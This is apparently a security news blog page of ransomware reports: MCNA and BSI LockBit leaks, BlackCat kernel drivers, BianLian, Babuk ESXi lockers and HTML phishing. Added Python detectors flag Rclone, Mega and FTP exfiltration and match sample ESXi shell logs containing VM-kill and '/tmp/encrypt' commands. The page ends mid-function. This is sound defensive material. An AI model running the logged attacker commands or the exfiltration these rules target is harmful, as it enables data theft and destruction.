Showing posts with label Ransomware.

9 Million Patients' Data Exposed by Ransomware Attack on US Dental Giant

A ransomware attack on one of the largest dental health insurers in the United States may have exposed the personal information of nearly nine million people.

According to Managed Care of North America (MCNA) Dental, a dental benefits insurer headquartered in the United States, the company noticed unauthorized activity in its computer systems on March 6, 2023, stopped it, and began an investigation.

Despite those steps, the LockBit ransomware gang, which claimed responsibility for the attack, threatened to leak 700GB of data stolen from MCNA's network unless the company paid a $10 million ransom. When no payment came, the group reportedly published the data on its leak site on April 7, where anyone could download it.

There are several dental insurers in the United States, but MCNA Dental describes itself as the nation's largest dental insurer for children and seniors covered by government-sponsored plans. In the notices it posted on Friday, the company said it became aware on March 6 that "certain activities in our computer system took place without our permission" and took action. Its investigation found that an intruder had access to its systems between February 26 and March 7, 2023.

MCNA's breach notice ticks the typical boxes: the company found that a criminal was able to view and copy some information stored in its computer system. Affected individuals are being offered identity-protection services through IDX, a ZeroFox Inc.-owned company.

The stolen information includes names, addresses, dates of birth, telephone numbers, e-mail addresses, Social Security numbers, driver's license numbers and other government-issued identification numbers. It also includes health insurance plan details, Medicaid ID numbers, dental care records, and billing and insurance claim information.

Around the same time, PharMerica, a leading pharmacy service provider operating in more than 2,500 facilities across the US and offering over 3,100 pharmacy and healthcare programs, announced a separate data breach affecting nearly six million patients.

In its notification to Maine's attorney general, PharMerica said it discovered suspicious activity on its computer network on March 14.

LockBit claimed responsibility for the MCNA attack on March 7, threatening to publish the 700 gigabytes of stolen data unless a $10 million ransom was paid, and released the data on April 7 after MCNA did not pay.

To assist people whose personal information may have been involved in this incident, the insurer is now sending individual letters directly to them. 

Questions remain about the liability that follows from LockBit holding and publishing the data, and about the timing of MCNA's own notice. The company did not notify patients until well over a month after LockBit first released the data, which gave threat actors ample opportunity to target affected individuals before they had been told.

Security experts have long advised ransomware victims not to pay attackers for decryption keys. Double-extortion attacks, in which leaked data can cause long-term harm to both companies and their clients, have complicated that calculus. There are several factors to weigh before paying: giving in to a demand may look like the quickest way out, but payment does not guarantee that the stolen copy of the data will be deleted.

Organizations can take several measures to prevent ransomware attacks from gaining a foothold in their networks. These measures include enhancing their overall security defense posture and implementing multifactor authentication (MFA). 

Organizations should also maintain strong anti-phishing controls, since attackers often use credentials stolen through phishing as the entry point for ransomware and other malware.

Using Ransomware to Extort Employers by Impersonating a Gang

A 28-year-old man from Fleetwood, Hertfordshire, has pleaded guilty at Reading Crown Court to blackmail and to unauthorized access to a computer with intent to commit other offences, after trying to extort his own employer during a ransomware attack.

The South East Regional Organised Crime Unit (SEROCU) said in a press release that Ashley Liles was working as an IT Security Analyst at a company in Oxford when it was hit by a ransomware attack in February 2018.

The cybercriminals contacted the company's executive team to demand a ransom payment, the same plan used in many ransomware attacks.

Liles joined the company's internal investigation and incident response effort alongside colleagues and the police.

During that period, Liles allegedly tried to profit from the attack by tricking his employer into paying the ransom to him rather than to the external attacker.

The SEROCU announcement reads, "Instead of pursuing a criminal case against the company, Liles also began a further and secondary attack against the company unbeknownst to the police, his colleagues, or his employer." 

He accessed a board member's private emails more than 300 times and altered the original blackmail email sent by the attacker, changing the payment details it contained.

The plan was to divert the payment from the attacker's account to Liles' own cryptocurrency wallet.

SEROCU said Liles also created an email address almost identical to the original attacker's and used it to send his employer further emails pressing for payment.

The company owner refused to pay. The internal investigation then revealed that the unauthorized access to the private emails had come from Liles' home IP address, pointing to him as the person responsible.

By the time SEROCU's cyber-crime team searched Liles' home and seized his devices, he knew the investigation was closing in on him and had wiped them. Investigators were nevertheless able to recover incriminating data from his computer.

After denying any involvement for five years, Liles pleaded guilty at a hearing at Reading Crown Court. He is due to be sentenced on July 11, 2023.

In the UK, unauthorized access to a computer is punishable by up to two years in prison, while blackmail carries a maximum sentence of 14 years.

Malicious Windows Kernel Drivers Utilized in BlackCat Ransomware Attacks

Researchers have identified an endpoint-security evasion technique used by the BlackCat ransomware group. Once inside a network, the group loads signed Windows kernel drivers to control and terminate the security processes running on protected machines.

Trend Micro's analysis expects this to become a standard technique in cybercriminals' arsenals. Microsoft has revoked multiple hardware developer accounts that were used to sign the drivers seen in these attacks.

BlackCat affiliates are known to employ a variety of defense evasion techniques in order to remain undetected for as long as possible. The latest is the use of malicious kernel drivers signed through Microsoft hardware developer accounts. According to Trend Micro, this lets the attackers impair defenses on a compromised host by manipulating, halting and killing the processes belonging to security agents on the endpoint.

Windows will not load a kernel-mode driver unless it carries a trusted signature; for new drivers on 64-bit Windows 10 and later that means a signature obtained through Microsoft's hardware developer program. According to Microsoft's documentation, the main exceptions are machines with test signing enabled or a kernel debugger attached, which is precisely why attackers go to the trouble of obtaining legitimate-looking signatures.

Trend Micro's data shows the technique was used in earlier BlackCat attacks this year. Attackers typically get malicious kernel drivers signed by abusing Microsoft's signing portals, by utilizing leaked or stolen code-signing certificates, or by buying signatures from underground signing services, any of which gives them a driver that the operating system will trust.
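A first check a defender can run against this technique, added here as an example rather than code from Trend Micro or Microsoft: triage Sysmon Event ID 6 (DriverLoad) records. The event text, the driver paths and the blocklist hashes are constructed for the example; the signer name "Microsoft Windows Hardware Compatibility Publisher" is what attestation-signed third-party drivers carry, and the caveat the code encodes is that such a driver reports a perfectly valid signature, so load path and hash have to carry the decision.

```python
"""Triage Sysmon Event ID 6 (DriverLoad) records for suspicious kernel drivers.

Added example for this page; it is not code from Trend Micro, Microsoft or the
BlackCat analysis. The event text below is constructed, and the hashes in
KNOWN_BAD_SHA256 are placeholders, not real indicators.
"""
import re
from typing import Dict, List, Tuple

# Constructed Sysmon EventID 6 messages (field names match Sysmon's DriverLoad event).
SAMPLE_EVENTS = """\
ImageLoaded: C:\\Windows\\System32\\drivers\\ndis.sys
Hashes: SHA256=AAAA0000000000000000000000000000000000000000000000000000000000A1
Signed: true
Signature: Microsoft Windows
SignatureStatus: Valid
---
ImageLoaded: C:\\Users\\Public\\example_drv.sys
Hashes: SHA256=BBBB0000000000000000000000000000000000000000000000000000000000B2
Signed: true
Signature: Microsoft Windows Hardware Compatibility Publisher
SignatureStatus: Valid
---
ImageLoaded: C:\\Windows\\Temp\\helper.sys
Hashes: SHA256=CCCC0000000000000000000000000000000000000000000000000000000000C3
Signed: false
Signature: -
SignatureStatus: Unavailable
"""

# Placeholder blocklist standing in for a real feed (e.g. the Microsoft
# vulnerable driver blocklist or vendor IoCs). These are not real hashes.
KNOWN_BAD_SHA256 = {
    "BBBB0000000000000000000000000000000000000000000000000000000000B2",
}

# Drivers that ship with Windows live here; anything else deserves a second look.
TRUSTED_DRIVER_DIR = re.compile(r"^c:\\windows\\system32\\drivers\\", re.IGNORECASE)

# Attestation-signed third-party drivers carry this signer. BlackCat's drivers
# were signed this way, so a "Valid" signature alone is not a clean bill of health.
ATTESTATION_SIGNER = "Microsoft Windows Hardware Compatibility Publisher"


def parse_events(text: str) -> List[Dict[str, str]]:
    """Split the constructed message dump into one dict per event."""
    events = []
    for chunk in text.strip().split("---"):
        fields = {}
        for line in chunk.strip().splitlines():
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
        if fields:
            events.append(fields)
    return events


def sha256_of(event: Dict[str, str]) -> str:
    """Pull the SHA256 component out of Sysmon's comma-separated 'Hashes' field."""
    for part in event.get("Hashes", "").split(","):
        algo, _, digest = part.partition("=")
        if algo.strip().upper() == "SHA256":
            return digest.strip().upper()
    return ""


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (driver path, reason) for every driver load worth escalating."""
    findings = []
    for ev in events:
        path = ev.get("ImageLoaded", "")
        reasons = []
        if ev.get("Signed", "").lower() != "true" or ev.get("SignatureStatus") != "Valid":
            reasons.append("unsigned or invalid signature")
        if sha256_of(ev) in KNOWN_BAD_SHA256:
            reasons.append("hash on blocklist")
        # The BlackCat case: signature valid, signer legitimate, but the driver
        # was dropped somewhere a real hardware driver would never be installed.
        if ev.get("Signature") == ATTESTATION_SIGNER and not TRUSTED_DRIVER_DIR.match(path):
            reasons.append("attestation-signed driver loaded from a non-system path")
        for r in reasons:
            findings.append((path, r))
    return findings


if __name__ == "__main__":
    for path, reason in triage(parse_events(SAMPLE_EVENTS)):
        print(f"{reason:55s} {path}")
```

The path rule is deliberately crude; in production you would replace it with an allowlist of expected signers and hashes per host class, and feed the hash lookup from the Microsoft vulnerable driver blocklist or your vendor's IoCs rather than a hard-coded set.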

According to the analysis, these new approaches will most likely become part of a cybercriminal's toolkit. “Because of these added layers of protection, attackers tend to opt for the path of least resistance to get their malicious code running via the kernel layer (or even lower levels). This is why we believe that such threats will not disappear from threat actors’ toolkits anytime soon.”

BlackCat ransomware, also known as ALPHV, first appeared in November 2021 and has hit targets in many countries including Australia, India and the United States, demanding ransoms ranging from $400,000 to $3 million in Bitcoin or Monero.

The Russian-speaking group is reported to have ties to DarkSide, the group responsible for the May 2021 attack on Colonial Pipeline, which shut down the main fuel pipeline serving the US East Coast and prompted the US government to issue an emergency declaration.

Data And Employees Of BSI Shared On The Dark Web By LockBit Ransomware Gang

A data breach at Bank Syariah Indonesia (BSI), one of Indonesia's leading Islamic banks, caused significant disruption to its normal operations and payment systems and compromised customers' personal and financial details.

The LockBit ransomware group claims to have published 1.5 TB of data belonging to BSI customers and employees on its dark web leak site. The gang leaked the identity data of millions of BSI customers after it did not receive the demanded ransom in time.

Over the past few years, companies and government agencies have had several data breaches in Indonesia. A cybersecurity expert described it as one of the biggest breaches at a financial institution in the country. 

During the attack, BSI was forced to take all of its services offline. Management initially told customers and partners that the outage was the result of technical maintenance.

The threat-intelligence account @darktracer_int later reported on Twitter that LockBit 3.0 was distributing 1.5 TB of BSI data via its leak site.

In a separate, earlier incident, CNN Indonesia reported that attackers stole "non-critical data" belonging to employees of Bank Indonesia (BI), the country's central bank, and used ransomware payloads to infect several dozen systems within the bank's network before attempting to extort it.

According to the bank, as first reported by Reuters, the incident had no impact on BI's public services.

"BI is aware of a ransomware hack last month. We know we have been hit by a cyberattack. This is a crime, it is real, and we are exposed to it," Erwin Haryono, head of BI's communications department, told local media.

Returning to the BSI attack: LockBit set a ransom deadline of 15 May. The group claimed to have obtained the following data:
  • Nine databases containing over 15 million individual records of personal information, covering both customers and employees.
  • Names, phone numbers, addresses, account data, card details and transaction details.
  • Legal documents.
  • Passwords for all of the bank's internal and external services.

In a statement released on Wednesday, the central bank of Indonesia said it is confident that the country's payment system is safe and reliable for any transaction. 

Additionally, the authorities stated that they would continue to ensure that payment service providers meet all regulatory requirements in the future. BSI's payment system (under Bank Indonesia's supervision) has also returned to normal. 

BSI President and CEO Hery Gunardi announced on May 11 that ATMs and branches were available to the public again, describing strengthened capacity and restored key channels as central to the recovery. A BSI official had explained the May 8 disruption as maintenance on the company's IT systems carried out to mitigate risk.

Screenshots of the group's negotiation with bank representatives between May 8 and May 13 were also published. They show the bank offering $10 million to recover the stolen data, LockBit demanding $20 million, and the bank then ceasing to respond.

Earlier this month LockBit tweeted that the negotiation period had ended and that all of the stolen Bank Syariah Indonesia data was now publicly available on its leak site.

A month after the attack, reports indicated that BSI had still not fully restored all of its systems. Customers who found their data in the leak are bringing a class action lawsuit.

In the earlier Bank Indonesia incident, the central bank did not say which ransomware gang was responsible, but Conti posted a series of files it claimed were stolen from Bank Indonesia's network, threatening to release 13.88 GB of data if the bank did not pay.

A Bank Indonesia representative contacted by BleepingComputer at the time had no comment. Conti's Ransomware-as-a-Service (RaaS) operation is linked to the Russian cybercriminal group Wizard Spider, which is also behind Ryuk, TrickBot and BazarLoader.

Conti affiliates typically gain a foothold when corporate workstations are infected with BazarLoader or TrickBot, then take remote control of the compromised machines through their command-and-control infrastructure. Once inside the victim's internal network, the operators spread to other devices across the network before deploying the ransomware.

Conti's victims have included Ireland's Department of Health (DoH) and Health Service Executive (HSE), and the marketing and communications firm RR Donnelley (RRD), which provides services to government.

The FBI has also issued and updated an advisory warning of increased Conti ransomware activity.

BianLian Ransomware has Switched to Extortion-only Attacks, FBI Confirms

The Cybersecurity and Infrastructure Security Agency (CISA) has issued a joint Cybersecurity Advisory with government agencies in the United States and Australia, alerting organizations to the latest tactics, techniques, and procedures (TTPs) used by the BianLian ransomware group.

BianLian is a ransomware and data extortion gang that has been attacking critical infrastructure in the United States and Australia since June 2022. The advisory, part of the #StopRansomware effort, is based on FBI and Australian Cyber Security Centre (ACSC) investigations as of March 2023. Its goal is to give defenders the information they need to adjust their defenses and improve their security posture against BianLian and similar threats.

BianLian used a double-extortion technique at first, encrypting systems after collecting private data from victim networks and then threatening to leak the contents. However, after Avast produced a decryptor for the ransomware in January 2023, the organization shifted to extortion based on data theft rather than encrypting systems.

This strategy remains appealing since the incidents are still data breaches that damage the victim's reputation, erode customer trust, and create legal exposure. According to CISA, BianLian gains access by using valid Remote Desktop Protocol (RDP) credentials obtained from initial access brokers or through phishing.

BianLian then performs network reconnaissance using a custom backdoor written in Go, commercial remote access tools, and native command-line tools and scripts. The final stage is exfiltration of victim data over the File Transfer Protocol (FTP), with the Rclone tool, or to the Mega file hosting service.
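The exfiltration stage is one of the few places this activity is visible at the network edge. The following is an added example, not code from the advisory, that scores constructed outbound proxy/firewall records for the three channels named above (FTP, Rclone, Mega); the CSV layout, the Mega host suffixes, the rclone user-agent prefix and the 500 MiB threshold are assumptions to adapt to your own logs.

```python
"""Flag likely bulk exfiltration (Rclone, Mega, FTP) in outbound proxy/firewall logs.

Added example for this page, not code from CISA, the FBI or the ACSC. The log
lines are constructed in a simple CSV layout:
    timestamp,src_ip,dst_host,dst_port,proto,user_agent,bytes_out
Hostnames, the rclone user-agent prefix and the byte threshold are assumptions.
"""
import csv
import io
import ipaddress
from collections import defaultdict
from typing import Dict, List

# Constructed records: one workstation pushing data to Mega with rclone and FTP,
# one doing ordinary browsing plus an internal FTP transfer.
SAMPLE_LOG = """\
2023-03-10T02:01:05Z,10.0.5.23,g.api.mega.co.nz,443,https,rclone/v1.61.1,73400320
2023-03-10T02:01:09Z,10.0.5.23,gfs204n118.userstorage.mega.co.nz,443,https,rclone/v1.61.1,734003200
2023-03-10T02:03:44Z,10.0.5.23,203.0.113.7,21,ftp,-,52428800
2023-03-10T09:15:00Z,10.0.7.41,www.example.org,443,https,Mozilla/5.0,20480
2023-03-10T09:16:10Z,10.0.7.41,10.0.1.9,21,ftp,-,1048576
"""

# File-hosting services the advisory names as an exfiltration channel (Mega),
# matched by domain suffix so API and storage hosts are caught too (assumption).
FILE_HOSTING_SUFFIXES = ("mega.nz", "mega.co.nz")
BYTES_OUT_THRESHOLD = 500 * 1024 * 1024  # 500 MiB per source per log window (assumption)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def is_internal(host: str) -> bool:
    """True for RFC1918/loopback IP destinations; hostnames are treated as external."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(ip in net for net in INTERNAL_NETS)


def matches_file_hosting(host: str) -> bool:
    """Exact or subdomain match against the file-hosting suffix list."""
    h = host.lower()
    return any(h == s or h.endswith("." + s) for s in FILE_HOSTING_SUFFIXES)


def analyse(log_text: str) -> Dict[str, List[str]]:
    """Return {src_ip: [reasons]} for every source that tripped at least one rule."""
    reasons = defaultdict(set)
    bytes_out = defaultdict(int)
    fields = ["ts", "src", "dst", "port", "proto", "ua", "bytes"]
    for row in csv.DictReader(io.StringIO(log_text), fieldnames=fields):
        src, dst = row["src"], row["dst"]
        bytes_out[src] += int(row["bytes"])
        if matches_file_hosting(dst):
            reasons[src].add("traffic to file-hosting service " + dst)
        if row["ua"].lower().startswith("rclone/"):
            reasons[src].add("rclone user agent")
        if row["proto"] == "ftp" and not is_internal(dst):
            reasons[src].add("FTP to external host " + dst)
    # Volume rule: a single host shipping hundreds of MiB out is itself a signal,
    # regardless of which service it used.
    for src, total in bytes_out.items():
        if total >= BYTES_OUT_THRESHOLD:
            reasons[src].add(f"{total / 2**20:.0f} MiB sent out")
    return {src: sorted(r) for src, r in reasons.items()}


if __name__ == "__main__":
    for src, why in analyse(SAMPLE_LOG).items():
        print(src, "->", "; ".join(why))
```

Rclone and FTP are both easy to rename or tunnel, so the volume rule is the one that survives the attacker changing tools; the service and user-agent rules are there to give the alert a name an analyst can act on quickly.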

BianLian uses PowerShell and the Windows Command Shell to stop running processes connected with antivirus technologies in order to avoid identification by security software. The Windows Registry is also tampered with in order to defeat the tamper protection provided by Sophos security solutions.

Proposed mitigations include limiting the use of RDP and other remote desktop services, disabling command-line and scripting activities and permissions where they are not needed, and restricting PowerShell on critical systems. The advisory recommends the following measures to help defend the network:
  • Audit and control the execution of remote access tools and software on your network.
  • Restrict usage of remote desktop services like RDP and enforce stringent security measures.
  • Limit PowerShell use, update to the latest version, and enable enhanced logging.
  • Regularly audit administrative accounts and employ the principle of least privilege.
  • Develop a recovery plan with multiple copies of data stored securely and offline.
  • Adhere to NIST standards for password management, including length, storage, reuse, and multi-factor authentication.
  • Regularly update software and firmware, segment networks for improved security, and actively monitor network activity.
"FBI, CISA, and ACSC encourage critical infrastructure organizations and small- and medium-sized organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of BianLian and other ransomware incidents," as per CISA.

The full bulletins from CISA and the ACSC contain more detailed mitigations, indicators of compromise (IoCs), command traces, and descriptions of BianLian's techniques.

Hackers Come up With Innovative Methods to Enforce Ransomware Payment

Ransomware is still one of the most serious cybersecurity risks that organizations and governments face. However, as organizations make a conscious decision to deny ransom payment demands, cybercriminals are devising new methods to recover ransom from their victims. 

The fall of the most known ransomware gang, Conti, in May 2022, was expected to result in a significant decrease in ransomware attacks. Tenable discovered that 35.5% of breaches in 2022 were caused by a ransomware assault, a slight 2.5% decline from 2021. Meanwhile, ransomware payouts are expected to fall by 38% in 2022, prompting hackers to embrace more professional and corporate approaches to assure larger returns, according to Trend Micro's Annual Cybersecurity Report.

“Cybercriminals increasingly have KPIs and targets to achieve. There are specific targets that they need to penetrate within a specific time period. It has become a very organized crime because of the business model that the ransomware groups follow because of which they have started increasing the pressure,” said Maheswaran S, country manager at Varonis Systems. 

Double extortion is a strategy that ransomware criminal groups are increasingly employing. The ransomware group, in addition to encrypting the files on the victim's devices, downloads private data from the victim's machine in the double extortion method.

“This gives them more leverage, since now the question is not only about decrypting the locked data but also about leaking it,” Mehardeep Singh Sawhney, a threat researcher at CloudSEK, said.

The BlackCat ransomware group is one example of this. According to CloudSEK, this ransomware gang can encrypt and steal data from victims' PCs as well as other assets operating on them, such as ESXi servers. 

According to cybersecurity firm Redacted, the BianLian ransomware group shifted the focus of its attacks in March from encrypting victims' files to pure extortion as its means of extracting cash. Other groups go a step further, to triple extortion.

The ransomware gangs encrypt files, extract sensitive data, and then add distributed denial-of-service (DDoS) attacks to the mix in the triple extortion strategy. If the ransom is not paid, not only will the files stay locked, but regular services will be affected by DDoS. 

Another way ransomware groups put pressure on targets is to contact the victim organization's customers or stakeholders directly. Because this harms the victim's reputation and can cause financial damage greater than the ransom itself, victim organizations tend to pay up, according to Maheswaran.

According to Sawhney, the ransomware groups directly contact the victims' consumers via email or phone calls. The Cl0p ransomware organization, for example, emailed stakeholders and customers of their victims, alerting them that their data will be disclosed.

“Cl0p also maintained a website where a list of their victims and stakeholders was updated every day. This adds more pressure on the victim firm, making it seem like the fastest way to end the attack is to pay the ransom amount,” Sawhney said.

Lorenz ransomware and LockBit, in addition to contacting customers and stakeholders, released their ransom discussions with victim organizations on their leak site. "It can further damage the company's reputation and increase the perceived urgency of the ransom demand," cybersecurity firm Cyble stated in research.

According to Maheswaran, while organizations are deploying more controls to protect assets that store or access critical data, they do not essentially deploy the right controls around data, which is critical for making an attacker's job difficult in gaining access to or corrupting data.

To effectively respond to ransomware outbreaks, organizations' cybersecurity solutions must be responsive, agile, and easily scalable, which is best achieved through a combination of cloud and machine learning analytics, said Harshil Doshi, country director at Securonix.

“It is easier to avoid paying the ransom if you detect the risk before encryption occurs. Or you can avoid ransomware response workflows altogether by having an effective endpoint backup strategy,” Doshi added. 

To limit what a skilled attacker can do, organizations should identify their sensitive data and restrict access to it so that a single compromised account cannot reach all of it; adopt multifactor authentication, which Microsoft has reported blocks more than 99% of automated account-compromise attacks; and monitor user activity for signs of suspicious behavior.

It is also essential to have standard operating procedures for responding to ransomware incidents and user awareness programs to identify and report breaches, according to Maheswaran. CloudSEK recommends backing up critical data in a secure location to restore it in case of a ransomware attack. Organizations must keep their operating system, software, and security tools up to date with the latest security patches and updates, using reliable antivirus and antimalware software regularly updated.

VMware ESXi Ransomware on the Rise Due to Leaked Babuk Code

Security researchers have identified ten distinct ransomware families that recently branched off from Babuk, a ransomware family whose source code was leaked online in 2021.

Experts have long warned that hackers reuse leaked source code from well-known ransomware groups such as LockBit, Conti and REvil. In research published on Thursday, SentinelLabs said that around ten groups have built their own malware on Babuk.

The Babuk Locker ransomware builder was made publicly available online in June 2021, making it simple for any would-be criminal organisation to enter the ransomware market with little to no development work. 

Hackers are drawn to the Babuk Locker "builder" because it allows them to make unique variations of the Linux-based Babuk Locker ransomware that can be used to attack the common ESXi servers used by big organisations and corporations.

“Over the past two years, organized ransomware groups adopted Linux lockers, including ALPHV, Black Basta, Conti, Lockbit, and REvil,” SentinelLabs’ Alex Delamotte stated. “These groups focus on ESXi before other Linux variants, leveraging built-in tools for the ESXi hypervisor to kill guest machines, then encrypt crucial hypervisor files.” 
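The sequence Delamotte describes (kill the guests with the hypervisor's own tools, then go after the VM files) leaves a trail in the ESXi shell history. The following is an added example, not SentinelLabs' code, that reconstructs that chain from constructed /var/log/shell.log lines; the line layout, the command patterns and the 10-minute window are assumptions.

```python
"""Spot the ESXi "kill guests, then touch VM files" pattern in shell.log.

Added example for this page, not SentinelLabs' code. The log lines are
constructed to mimic ESXi's shell.log layout ("<ts> shell[<pid>]: [<user>]: <cmd>");
the command patterns and the 10-minute window are assumptions.
"""
import re
from datetime import datetime, timedelta
from typing import Dict, List

SAMPLE_SHELL_LOG = """\
2023-02-03T03:10:02Z shell[2099716]: [root]: esxcli vm process list
2023-02-03T03:10:07Z shell[2099716]: [root]: esxcli vm process kill --type=force --world-id=2098831
2023-02-03T03:10:09Z shell[2099716]: [root]: esxcli vm process kill --type=force --world-id=2098902
2023-02-03T03:11:40Z shell[2099716]: [root]: find /vmfs/volumes/ -type f -name "*.vmdk" -o -name "*.vmx"
2023-02-03T03:12:01Z shell[2099716]: [root]: chmod +x /tmp/encrypt
2023-02-03T03:12:03Z shell[2099716]: [root]: nohup /tmp/encrypt /vmfs/volumes/ &
2023-02-03T09:00:00Z shell[2101000]: [root]: esxcli storage filesystem list
"""

LINE_RE = re.compile(r"^(\S+) shell\[(\d+)\]: \[(\w+)\]: (.*)$")
# Stages of the locker playbook quoted above. "kill_guests" uses the hypervisor's
# own tooling, so it is indistinguishable from admin work on its own; the chain
# (kill, then enumerate VM files, then run something out of /tmp) is the signal.
STAGES = {
    "kill_guests": re.compile(r"esxcli vm process kill|vim-cmd vmsvc/power\.off"),
    "enumerate_vm_files": re.compile(r"\.(vmdk|vmx|vmsd|vmsn|vswp)\b"),
    "run_from_tmp": re.compile(r"(^|\s)(nohup\s+)?/tmp/\S+"),
}
WINDOW = timedelta(minutes=10)


def parse(log_text: str) -> List[Dict[str, object]]:
    """Turn shell.log lines into dicts with a parsed timestamp, shell pid, user and command."""
    out = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, pid, user, cmd = m.groups()
            out.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                        "pid": pid, "user": user, "cmd": cmd})
    return out


def find_chains(entries: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Return {shell pid: [stages]} for sessions where a guest kill is followed,
    within WINDOW, by VM-file enumeration and/or execution from /tmp."""
    hits: Dict[str, Dict[str, datetime]] = {}
    for e in entries:
        for stage, rx in STAGES.items():
            if rx.search(e["cmd"]):
                hits.setdefault(e["pid"], {}).setdefault(stage, e["ts"])  # first sighting
    chains = {}
    for pid, stages in hits.items():
        if "kill_guests" not in stages:
            continue
        t0 = stages["kill_guests"]
        later = [s for s in ("enumerate_vm_files", "run_from_tmp")
                 if s in stages and timedelta(0) <= stages[s] - t0 <= WINDOW]
        if later:
            chains[pid] = ["kill_guests"] + later
    return chains


if __name__ == "__main__":
    for pid, chain in find_chains(parse(SAMPLE_SHELL_LOG)).items():
        print(f"shell pid {pid}: {' -> '.join(chain)}")
```

Forwarding shell.log off the host matters more than the rule itself: the lockers encrypt the hypervisor's own files, so a copy that only lives on the ESXi datastore may not survive the attack.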

According to Delamotte, the ten versions they found appeared in the second half of 2022 and the first part of 2023, indicating "an increasing trend of Babuk source code adoption." 

SentinelLabs found connections between the leaked Babuk source code and the ESXi lockers of several well-known ransomware groups, including Conti, REvil, Play and Ransom House, all of which have been linked to some of the most damaging intrusions of the past two years.

In order to create ESXi lockers for themselves, smaller ransomware organisations have adopted the Babuk source code. 

To compare the variants circulating online, SentinelLabs built what it called a "baseline" Babuk from the leaked code. Among the many overlaps it found were the way the malware encrypts files and resemblances in the code itself.

The researchers also noted that Babuk has little in common with ESXiArgs, the campaign that raised alarm in February 2023 after more than 3,800 organisations in the US, France and Italy were hit. At the time, some wrongly blamed Babuk for that wave of attacks, which included Rice University, the Georgia Institute of Technology and the Supreme Court of Florida.

Emails With HTML Attachments are Still Popular Among Phishing Scammers

Cybercriminals are increasingly using malicious HTML files to attack computers, according to a recent study by Barracuda Networks. The study found that malicious files now account for over half of all HTML attachments sent via email, a significant increase compared to last year.

How does an HTML-attachment phishing scam work? Rather than placing a link or executable directly in the email, the attacker attaches an HTML file; when opened, it can redirect the victim or reach out to a command-and-control (C2) server to download crypto-malware, Trojans or other payloads.

Phishing scams built on HTML attachments have been around for a long time, but many people are still unaware of them and continue to fall for them.

HTML files remained one of the most common attachment types used in phishing in 2022, which shows that the method is still one of the most effective ways of getting past spam filters and reaching targets' inboxes.

HTML (HyperText Markup Language) is the markup language used to describe documents displayed in a web browser. Cascading Style Sheets (CSS) and scripting languages such as JavaScript extend what an HTML page can do.

A browser renders an HTML document, whether fetched from a web server or opened from local storage, as a multimedia web page. The document describes the content and semantics of the page along with hints about how it should appear to the end user.

Phishing emails carrying HTML files frequently direct victims to malicious websites, trigger file downloads, or display phishing forms locally in the victim's browser.

Email security software often lets such attachments through because an HTML file is not itself an executable and does not look like a threat, so the messages land successfully in recipients' inboxes.

One interesting aspect of the recent increase in malicious HTML files is that it does not appear to come from mass campaigns in which attackers send the same attachment to many victims; the attachments are varied.

This makes appropriate defensive measures more important than ever, and the report's findings point to where those measures should focus.

Microsoft has also reported the threat groups DEV-0238 and DEV-0253 using HTML smuggling in HTML attachments to deliver keyloggers, and DEV-0193 using the same technique to deliver Trickbot.

HTML attachments are used in phishing attacks 


The most common type of malicious HTML attachment is a spammed phishing page. Often the HTML file contains no malicious code at all, in the sense of nothing that executes arbitrary code on the system, so it looks benign, but it should still be treated with caution. By mimicking the sign-in page of a service such as Microsoft, Google, or a major online bank, it tricks the user into entering credentials into a form that submits them to an attacker-controlled website, which then takes over the account.

When it comes to spam forms and redirection strategies in HTML attachments, hackers usually use several tactics for implementation. These tactics range from simple redirections to obfuscating JavaScript to disguise phishing forms to steal personal information. 

A secure email gateway and antivirus solution can check email messages for attachments to see if they contain malicious URLs, scripts, or other threats. This could threaten users' security. 

Most such attacks build the malicious phishing form or redirect with JavaScript inside the HTML attachment, specifically to avoid detection. 
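As an added example (not code from the original article or from any product it mentions), the scanner below shows the kind of check a gateway can run on an HTML attachment: it scores obfuscation and redirection indicators, decodes long base64 blobs so a form hidden behind `atob()`/`document.write()` is inspected too, and flags password fields that post to an external host. The indicator patterns, weights, threshold and sample attachments are all constructed for this illustration.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field

# Heuristic indicators of obfuscated phishing HTML. Patterns and weights are
# constructed for this example; tune them against your own mail corpus.
INDICATORS = {
    "eval": (re.compile(r"\beval\s*\(", re.I), 3),
    "unescape": (re.compile(r"\bunescape\s*\(", re.I), 3),
    "fromCharCode": (re.compile(r"String\.fromCharCode", re.I), 3),
    "atob": (re.compile(r"\batob\s*\(", re.I), 2),
    "document_write": (re.compile(r"document\.write(?:ln)?\s*\(", re.I), 2),
    "meta_refresh": (re.compile(r'<meta[^>]+http-equiv\s*=\s*["\']?refresh', re.I), 3),
    "js_redirect": (re.compile(r"\blocation(?:\.href)?\s*=[^=]", re.I), 2),
    "password_input": (re.compile(r'<input[^>]+type\s*=\s*["\']?password', re.I), 2),
    "external_form": (re.compile(r'<form[^>]+action\s*=\s*["\']?https?://', re.I), 3),
}
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")
LURE_PHRASES = ("microsoft", "office 365", "onedrive", "google", "sign in", "verify your account")
SUSPICIOUS_THRESHOLD = 5


@dataclass
class ScanResult:
    score: int = 0
    hits: list = field(default_factory=list)
    decoded_layers: int = 0

    @property
    def verdict(self) -> str:
        return "suspicious" if self.score >= SUSPICIOUS_THRESHOLD else "clean"


def decode_base64_blobs(text: str) -> list[str]:
    """Decode long base64 runs that turn into readable text (a hidden HTML/JS layer)."""
    layers = []
    for blob in BASE64_BLOB.findall(text):
        try:
            candidate = base64.b64decode(blob).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch.isspace() for ch in candidate):
            layers.append(candidate)
    return layers


def scan_attachment(html: str, max_layers: int = 4) -> ScanResult:
    """Score an HTML attachment, following base64-encoded layers a few levels deep."""
    result = ScanResult()
    pending = [html]
    seen: set[str] = set()
    examined = 0
    while pending and examined < max_layers:
        text = pending.pop(0)
        examined += 1
        for name, (pattern, weight) in INDICATORS.items():
            if name not in seen and pattern.search(text):
                seen.add(name)
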